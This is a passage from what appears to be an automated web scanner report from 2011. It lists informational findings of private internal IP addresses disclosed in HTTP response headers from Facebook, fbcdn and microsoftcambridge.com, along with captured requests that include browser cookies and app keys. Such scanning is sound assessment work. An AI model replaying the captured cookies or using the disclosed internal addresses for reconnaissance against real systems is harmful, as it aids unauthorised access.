.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.195. http://microsoftcambridge.com/img/teams/working_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/teams/working_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/teams/working_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:14:42 GMT
Content-Length: 3528
Date: Sat, 26 Mar 2011 01:42:20 GMT
X-Varnish: 1939094450
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...l...........X.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.196. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.199
X-Cnection: close
Content-Length: 3200
Vary: Accept-Encoding
Cache-Control: public, max-age=587
Expires: Sat, 26 Mar 2011 20:45:55 GMT
Date: Sat, 26 Mar 2011 20:36:08 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
24.197. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/HK9HyX1GgWJ.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yB/r/HK9HyX1GgWJ.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yB/r/HK9HyX1GgWJ.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 25 Mar 2011 21:24:44 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 74894
Vary: Accept-Encoding
Cache-Control: public, max-age=31482600
Expires: Sat, 24 Mar 2012 21:32:26 GMT
Date: Sat, 26 Mar 2011 12:22:26 GMT
Connection: close

/*1301088735,169776319*/

if (window.CavalryLogger) { CavalryLogger.start_js(["GZ58n"]); }

!function(){function a(b){return function(){if(this===window)throw new TypeError();return b.apply(this,argum
...[SNIP]...
24.198. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=4d965afccc4d86c598dbf5d94fb34a7c&app_id=4d965afccc4d86c598dbf5d94fb34a7c&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df88474c98%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff94930be8%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df2dd5d0f98%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfde8aea0c%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff94930be8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2dd5d0f98&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df163784e44%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff94930be8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2dd5d0f98&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c9c353c8%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff94930be8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2dd5d0f98&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS; wd=150x21

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f163784e44&origin=http%3A%2F%2Fwww.huffingtonpost.com%2Ff94930be8&relation=parent&transport=postmessage&frame=f2dd5d0f98
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.142.116
X-Cnection: close
Date: Sat, 26 Mar 2011 20:36:06 GMT
Content-Length: 0

24.199. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=2431184420&app_id=2431184420&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c9ad5ce%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff31687174c%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Dfa3f2d664%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3fb61d484%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff31687174c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa3f2d664&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df76daec8c%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff31687174c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa3f2d664&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7da2f7ac%26origin%3Dhttp%253A%252F%252Fwww.citysbest.com%252Ff31687174c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa3f2d664&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS; wd=150x21

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f76daec8c&origin=http%3A%2F%2Fwww.citysbest.com%2Ff31687174c&relation=parent&transport=postmessage&frame=fa3f2d664
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.133.116
X-Cnection: close
Date: Sat, 26 Mar 2011 20:36:21 GMT
Content-Length: 0

24.200. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/download/fastreport.net-download.html/?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS; wd=150x21

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.122.49
X-Cnection: close
Date: Sat, 26 Mar 2011 17:11:53 GMT
Content-Length: 8300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
24.201. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=4d965afccc4d86c598dbf5d94fb34a7c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24c1751d4%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff94930be8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=lucida%20grande&href=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F03%252F26%252Fgeraldine-ferraro-dead-dies_n_840995.html&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=244 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS; wd=150x21

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.115.128
X-Cnection: close
Date: Sat, 26 Mar 2011 20:36:21 GMT
Content-Length: 11939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
24.202. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS; wd=150x21

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.76.31
X-Cnection: close
Date: Sat, 26 Mar 2011 17:11:46 GMT
Content-Length: 8289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
24.203. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.75.75
X-Cnection: close
Date: Sat, 26 Mar 2011 17:11:31 GMT
Content-Length: 8259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
24.204. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/download/fastreport.net-download.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS; wd=150x21

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.99.67
X-Cnection: close
Date: Sat, 26 Mar 2011 17:11:42 GMT
Content-Length: 8297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
24.205. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/products/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS; wd=150x21

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.47.47
X-Cnection: close
Date: Sat, 26 Mar 2011 12:22:45 GMT
Content-Length: 8269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
24.206. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS; wd=150x21

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.79.81
X-Cnection: close
Date: Sat, 26 Mar 2011 12:22:40 GMT
Content-Length: 8289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
24.207. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/products/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS; wd=150x21

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.42.35
X-Cnection: close
Date: Sat, 26 Mar 2011 17:11:33 GMT
Content-Length: 8269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
24.208. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.96.49
X-Cnection: close
Date: Sat, 26 Mar 2011 12:22:26 GMT
Content-Length: 8259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
24.209. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-Reports%2F133167183399602&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/products/FastReport.Net.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
